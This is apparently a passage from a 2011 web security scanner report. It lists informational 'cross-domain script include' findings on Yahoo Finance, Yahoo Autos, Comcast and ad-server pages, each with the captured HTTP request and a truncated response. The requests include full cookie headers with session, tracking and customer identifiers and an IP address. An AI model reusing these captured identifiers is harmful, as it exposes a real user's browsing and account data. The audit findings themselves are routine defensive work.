Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; AutosBH=bh=W1siMjAxMTA5MDZfMDU6NDU6NDIiLCJhdXRvcy55YWhvby5jb21cL2RhcmxhXC9tZC5waHA_ZW49dXRmLTgiXSxbIjIwMTEwOTA2XzA1OjQ1OjQwIiwiYXV0b3MueWFob28uY29tXC9kYXJsYVwvZmMucGhwP2NiPVlBSE9PLmFkcy5kYXJsYS5fbG9hZGVkJmFtcDtwPWF1dG9zJmFtcDtmPTk2NDMyOTAwJmFtcDtsPUxSRUMmYW1wO2VuPXV0Zi04JmFtcDtucHY9MSZhbXA7cm49MTMxNTMzMTE0MDc3MyZhbXA7ZW09JTdCJTIyc2l0ZS1hdHRyaWJ1dGUlMjIlM0ElMjJjb250ZW50JTNEJTI3YXV0b3NjaCUzRCUyMiUyMiUyMGNvbnRlbnQlM0QlMjJBbGwlMjBDYXJzJTNCJTIyJTI3JTIyJTdEJmFtcDt0X2U9MSZhbXA7LmludGw9dXMiXV0-&ver=1; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:47:59 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: private
Age: 3
Server: YTS/1.19.5
Proxy-Connection: keep-alive
Content-Length: 90155

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<meta http-equiv="Content-Type" conte
...[SNIP]...
.css&pc/autos/p/mmt/modeloverview-min-42951.css&pc/autos/p/common/autos_reviews-min-42838.css&pc/autos/p/common/autos_write_review-min-43468.css&pc/autos/p/common/autos_global-delta_2011-07-22.css" />
<script type="text/javascript" src="http://l.yimg.com/zz/combo?yui:3.1.1/build/yui/yui.js"></script>
...[SNIP]...
</script><script charset='utf-8' type='text/javascript' src='http://l.yimg.com/zz/combo?kx/ucs/common/js/1/setup-min.js&kx/ucs/sts/js/83/skip-min.js&kx/ucs/menu_utils/js/134/menu_utils-min.js&kx/ucs/username/js/33/user_menu-min.js&kx/ucs/help/js/35/help_menu-min.js&kx/ucs/utility_link/js/15/utility_menu-min.js&kx/ucs/common/js/127/logo_debug-min.js&kx/ucs/homepage/js/124/homepage-min.js&kx/ucs/search/js/179/search-min.js'></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved --><script type="text/javascript"src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved --><script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://l.yimg.com/zz/combo?d/lib/yui/2.8.0r4/build/yahoo/yahoo-min.js&d/lib/yui/2.8.0r4/build/get/get-min.js&d/lib/yui/2.8.0r4/build/dom/dom-min.js&d/lib/yui/2.8.0r4/build/selector/selector-min.js&d/lib/yui/2.8.0r4/build/event/event-min.js&d/lib/yui/2.8.0r4/build/element/element-min.js&d/lib/yui/2.8.0r4/build/button/button.js&d/lib/yui/2.8.0r4/build/connection/connection-min.js&d/lib/yui/2.8.0r4/build/json/json-min.js&d/lib/yui/2.8.0r4/build/container/container-min.js&d/lib/yui/2.8.0r4/build/dragdrop/dragdrop-min.js&d/lib/yui/2.8.0r4/build/animation/animation-min.js&d/lib/ult/strip_1.12.js&pc/autos/p/common/autos_global-min-44130.js&pc/autos/p/mmt/autos_mmt_global-min-41705.js&a/lib/ush/ygsh_1.0.3.js&a/ult/ylc_1.9.js&pc/autos/p/mmt/autos_model-min-42790.js&pc/autos/p/common/autos_write_review-min-44131.js&pc/autos/p/mmt/autos_resize_list_modules-min-40691.js&pc/autos/p/common/autos_mvc-min-41705.js&d/lib/darla/fc_0.2.9.js&d/lib/darla/util_0.2.6.js&d/lib/darla/renderers/complex_renderer_0.3.0.js"></script>
...[SNIP]...

16.13. http://cdn.optmd.com/V2/80181/197812/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.optmd.com
Path:   /V2/80181/197812/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /V2/80181/197812/index.html HTTP/1.1
Host: cdn.optmd.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=3;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 21 Jun 2010 20:12:42 GMT
ETag: "800a0-152-4898fed55e280"
Accept-Ranges: bytes
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 338
Date: Tue, 06 Sep 2011 12:45:57 GMT
Connection: close

<html>
<head><meta http-equiv="CACHE-CONTROL" content="NO-CACHE" /><title>Capella University</title></head>
<body style="margin: 0px; padding: 0px;">
<script type="text/javascript" src="http://ad.doubleclick.net/adj/N5956.Casale/B3941858.3;sz=300x250;click0=http://c.casalemedia.com/c/4/1/80181/;ord=121245141?"></script>
...[SNIP]...

16.14. http://cdn.optmd.com/V2/80181/197813/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.optmd.com
Path:   /V2/80181/197813/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /V2/80181/197813/index.html HTTP/1.1
Host: cdn.optmd.com
Proxy-Connection: keep-alive
Referer: http://udmserve.net/udm/img.fetch?sid=2900;tid=1;ev=1;dt=1;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 21 Jun 2010 19:07:15 GMT
ETag: "dd49d6-151-4898f03449ec0"
Accept-Ranges: bytes
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 337
Date: Tue, 06 Sep 2011 12:45:59 GMT
Connection: close

<html>
<head><meta http-equiv="CACHE-CONTROL" content="NO-CACHE" /><title>Capella University</title></head>
<body style="margin: 0px; padding: 0px;">
<script type="text/javascript" src="http://ad.doubleclick.net/adj/N5956.Casale/B3941858.4;sz=728x90;click0=http://c.casalemedia.com/c/2/1/80181/;ord=965478884?"></script>
...[SNIP]...

16.15. http://customer.comcast.com/Pages/FAQViewer.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://customer.comcast.com
Path:   /Pages/FAQViewer.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Pages/FAQViewer.aspx?Guid=f8578a5e-0241-452c-ba18-278c838ac946 HTTP/1.1
Host: customer.comcast.com
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=internet+phone&cat=com#
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; ServerID=1035; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; mbox=session#1315327839174-766376#1315331754|PC#1315327839174-766376.19#1316539494|check#true#1315329954; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331694799%3B%20gpv_07%3Dcorporate%2520-%2520learn%2520-%2520xfinity%2520-%2520wireless-mobile-broadband%2520%7C1315331694819%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; VISITORID=2086762009; s_cc=true; s_sq=%5B%5BB%5D%5D; fsr.s={"v":1,"pv":8,"lc":{"d0":{"v":8,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}

Response

HTTP/1.0 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:25:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 38733


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
</script>
<script src="https://secure.xfinity.com/js-api/compressed/xpbar.js?version=2" type="text/javascript"></script>
...[SNIP]...

16.16. http://finance.yahoo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: finance.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5; finbeta=fp-bkt_o

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:53 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 176188

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Yahoo! Finance - Business Finance, Stock Market, Quotes, News</title>
<meta http
...[SNIP]...
35lww/A=3686344879798615672/R=0/X=6/*;mtfIFrameRequest=false;ord=1315313093.838484?" WIDTH=120 HEIGHT=30 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N3382.Yahoo/B5116950.102;abr=!ie;sz=120x30;pc=[TPAS_ID];click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bWU3ZjgxOChnaWQkRU5TOVYwUERram5wQVJwalRsLndqUU9uTWhkN2FrNW1GY1VBQ25laixzdCQxMzE1MzEzMDkzNzYzMDM1LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJFpFSFVnVVBEbUxNLSxjdCQyNSx5YngkeHVib0hhUEoyNm5oNFVHREVxT1hWQSxyJDEscmQkMTZpcGRqY2tkKSk/1/*http://global.ard.yahoo.com/SIG=15eak18sq/M=999999.999999.999999.999999/D=fin/S=7037371:T1/Y=YAHOO/EXP=1315320293/L=ENS9V0PDkjnpARpjTl.wjQOnMhd7ak5mFcUACnej/B=ZEHUgUPDmLM-/J=1315313093838484/K=NgNqbTU98ZoHkdL.F35lww/A=3686344879798615672/R=1/X=6/*;dcopt=rcl;mtfIFPath=nofile;ord=1315313093.838484"></SCRIPT>
...[SNIP]...
<img src="http://ads.yimg.com/a/i/sh/bl.gif" width=1 height=1 border=0><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d847178/33/873120/randm.js"></script>
...[SNIP]...
</script>

   
<script type="text/javascript" src="http://l.yimg.com/bm/combo?fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/yuiloader-dom-event/2.0.0/mini/yuiloader-dom-event.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/cookie/2.0.0/mini/cookie.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/connection/2.0.0/mini/connection.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/container/2.0.0/mini/container.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/animation/2.0.0/mini/animation.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/element/2.0.0/mini/element.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/tabview/2.0.0/mini/tabview.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/ylc_1.9.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_fp.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_mod_tech_ticker.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_symbolsuggest.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_ie9_pinning.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yui-min-3.2.0.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_nav_topnav.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_nav_topnav_init.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_symbol_suggest.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_loader.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_init_symbol_suggest.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_common.js&fi/common/p/d/static/js/2.0.188908/streaming/2.0.0/mini/yfi_cookie.js&fi/common/p/d/static/js/2.0.188908/streaming/2.0.0/mini/yfs.js&fi/common/p/d/static/js/2.0.188908/streaming/2.0.0/mini/yfs_backend.js&fi/common/p/d/static/js/2.0.188908/streaming/2.0.0/mini/yfs_frontend.js&fi/common/p/d/static/js/2.0.188908/translations/2.0.0/mini/yfs_l10n_en-US.js&fi/common/p/d/static/js/2.0.188908/streaming/2.0.0/mini/yfs_util.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://l.yimg.com/zz/combo?kx/ucs/common/js/1/setup-min.js&kx/ucs/sts/js/83/skip-min.js&kx/ucs/menu_utils/js/134/menu_utils-min.js&kx/ucs/username/js/33/user_menu-min.js&kx/ucs/help/js/35/help_menu-min.js&kx/ucs/utility_link/js/15/utility_menu-min.js&kx/ucs/common/js/127/logo_debug-min.js&kx/ucs/homepage/js/124/homepage-min.js&kx/ucs/search/js/179/search-min.js"></script>
...[SNIP]...
<![endif]-->

<script src="http://l.yimg.com/d/lib/rapid/rapid_2.1.0.js"></script>
...[SNIP]...

16.17. http://finance.yahoo.com/lookup

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /lookup

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lookup?s=xss HTTP/1.1
Host: finance.yahoo.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; finbeta=fp-bkt_o; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:06 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 64558

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<title>Symbol Lookup from Yahoo! Finance</title>
<meta http-equiv="Content
...[SNIP]...
7912/K=URqeTfr3zDD1947mBh5eOA/A=2892168919546073312/R=1/X=3/*;ord=1315313286327912?" WIDTH=120 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6067.160910.7443114402621/B5129127.36;abr=!ie;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15u84g3hn/M=601454399.602194378.673385551.687570551/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=PeL0lEPDkjnpARpjTl.wjQIrMhd7ak5mFoYAA903/B=l4Q4Q0PDhEw-/J=1315313286327912/K=URqeTfr3zDD1947mBh5eOA/A=2892168919546073312/R=2/X=3/*;ord=1315313286327912?"></SCRIPT>
...[SNIP]...
</script><SCRIPT type="text/javascript" src="http://resource.tcgmsrv.net/tase/js/uac.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://l.yimg.com/bm/combo?fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/yahoo-dom-event/2.0.0/mini/yahoo-dom-event.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/element/2.0.0/mini/element-min.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/get/2.0.0/mini/get.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/tabview/2.0.0/mini/tabview-min.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/yuiloader-dom-event/2.0.0/mini/yuiloader-dom-event.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/cookie/2.0.0/mini/cookie.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/connection/2.0.0/mini/connection.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/container/2.0.0/mini/container.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yui-min-3.2.0.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_nav_topnav.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_nav_topnav_init.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_symbol_suggest.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_loader.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_init_symbol_suggest.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/ylc_1.9.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_common.js"></script>

<script type="text/javascript" src="http://l.yimg.com/zz/combo?kx/ucs/common/js/1/setup-min.js&kx/ucs/sts/js/83/skip-min.js&kx/ucs/menu_utils/js/134/menu_utils-min.js&kx/ucs/username/js/33/user_menu-min.js&kx/ucs/help/js/35/help_menu-min.js&kx/ucs/utility_link/js/15/utility_menu-min.js&kx/ucs/common/js/127/logo_debug-min.js&kx/ucs/homepage/js/124/homepage-min.js&kx/ucs/search/js/179/search-min.js"></script>
...[SNIP]...

16.18. http://finance.yahoo.com/q

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /q

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /q;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--?s=XSS.F HTTP/1.1
Host: finance.yahoo.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/lookup?s=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; finbeta=fp-bkt_o; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:15 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Set-Cookie: PRF=&t=XSS.F; expires=Fri, 03 Sep 2021 05:48:15 GMT; path=/; domain=finance.yahoo.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 51214

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>XSS.F: S
...[SNIP]...
<div id="yfi_hd"><script type='text/javascript' src='http://l.yimg.com/bm/lib/fi/common/p/d/static/js/2.0.188908/2.0.0/yui-min-3.2.0.js'></script>
...[SNIP]...
</script><script charset='utf-8' type='text/javascript' src='http://l.yimg.com/zz/combo?kx/ucs/common/js/1/setup-min.js&kx/ucs/sts/js/83/skip-min.js&kx/ucs/menu_utils/js/134/menu_utils-min.js&kx/ucs/username/js/33/user_menu-min.js&kx/ucs/help/js/35/help_menu-min.js&kx/ucs/utility_link/js/15/utility_menu-min.js&kx/ucs/common/js/127/logo_debug-min.js&kx/ucs/homepage/js/124/homepage-min.js&kx/ucs/search/js/179/search-min.js'></script>
...[SNIP]...
</script>

<SCRIPT type="text/javascript" src="http://resource.tcgmsrv.net/tase/js/uac.js"></script>
...[SNIP]...
6686/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295276686?" WIDTH=120 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6067.160910.7443114402621/B5129127.36;abr=!ie;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15si3pdps/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=vYbXoUPDkjjpARpjTl.wjQKFMhd7ak5mFo8AAr9_/B=CoEoQ9BDRvY-/J=1315313295276686/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=2/X=3/*;ord=1315313295276686?"></SCRIPT>
...[SNIP]...
</script><script type="text/javascript" src="http://l.yimg.com/bm/combo?fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/yuiloader-dom-event/2.0.0/mini/yuiloader-dom-event.js&amp;fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/container/2.0.0/mini/container.js&amp;fi/common/p/d/static/js/2.0.188908/2.0.0/mini/ylc_1.9.js&amp;fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_loader.js&amp;fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_symbol_suggest.js&amp;fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_init_symbol_suggest.js&amp;fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_nav_topnav_init.js&amp;fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_nav_topnav.js"></script>
...[SNIP]...
<input type="hidden" id=".yficrumb" name=".yficrumb" value=""><script type="text/javascript" src="http://l.yimg.com/bm/combo?fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfs_concat.js&amp;fi/common/p/d/static/js/2.0.188908/translations/2.0.0/mini/yfs_l10n_en-US.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://l.yimg.com/bm/combo?fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/cookie/2.0.0/mini/cookie-min.js&amp;fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_ticker_concat.js"></script>
...[SNIP]...

16.19. http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.comcast.com
Path:   /t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431 HTTP/1.1
Host: forums.comcast.com
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=internet+phone&cat=com#
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331687930%3B%20gpv_07%3Dlocalization%2520-%2520shop%7C1315331688369%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; fsr.s={"v":1,"pv":7,"lc":{"d0":{"v":7,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; mbox=session#1315327839174-766376#1315331754|PC#1315327839174-766376.19#1316539494|check#true#1315329954; fsr.a=1315329894622

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:24:54 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Set-Cookie: VISITORID=2086762009; Domain=.comcast.com; Expires=Sat, 06-Sep-2014 05:51:12 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 119084
Connection: close
Content-Type: text/html;charset=UTF-8

